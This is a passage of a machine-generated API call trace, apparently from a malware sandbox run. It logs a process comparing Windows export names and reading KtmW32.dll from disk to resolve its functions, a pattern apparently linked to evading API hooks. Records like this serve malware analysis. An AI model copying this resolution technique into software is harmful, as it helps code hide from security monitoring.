lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0108.528] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0108.529] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0108.529] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0108.530] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0108.530] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0108.530] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0108.530] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0108.530] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0108.530] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0108.530] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0108.530] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0108.530] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0108.530] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0108.531] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0108.532] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0108.748] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0108.748] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0108.749] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0108.750] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0109.294] GetProcessHeap () returned 0x430000 [0109.294] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x411b040 | out: hHeap=0x430000) returned 1 [0109.301] GetProcessHeap () returned 0x430000 [0109.301] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449140 [0109.301] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0109.305] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0109.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0109.306] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0109.306] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0109.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0109.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0109.307] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0109.307] GetProcessHeap () returned 0x430000 [0109.307] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5e00) returned 0x2d55030 [0109.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0109.308] ReadFile (in: hFile=0x17c, lpBuffer=0x2d55030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d55030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0109.308] CloseHandle (hObject=0x17c) returned 1 [0109.309] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0109.309] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0109.309] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0109.309] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0109.309] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0109.309] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0109.309] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0109.309] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0109.309] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0109.309] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0109.309] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0109.309] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0109.309] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0109.309] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0109.309] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0109.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0109.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0109.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0109.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0109.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0109.310] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0109.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0109.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0109.310] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0109.310] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0109.310] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0109.310] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0109.310] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0109.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0109.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0109.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0109.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0109.311] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0109.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0109.311] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0109.312] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0109.312] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.312] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0109.312] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0109.312] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.313] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0109.313] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.313] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0109.313] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0109.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0109.313] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0109.314] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0109.314] lstrcmpA 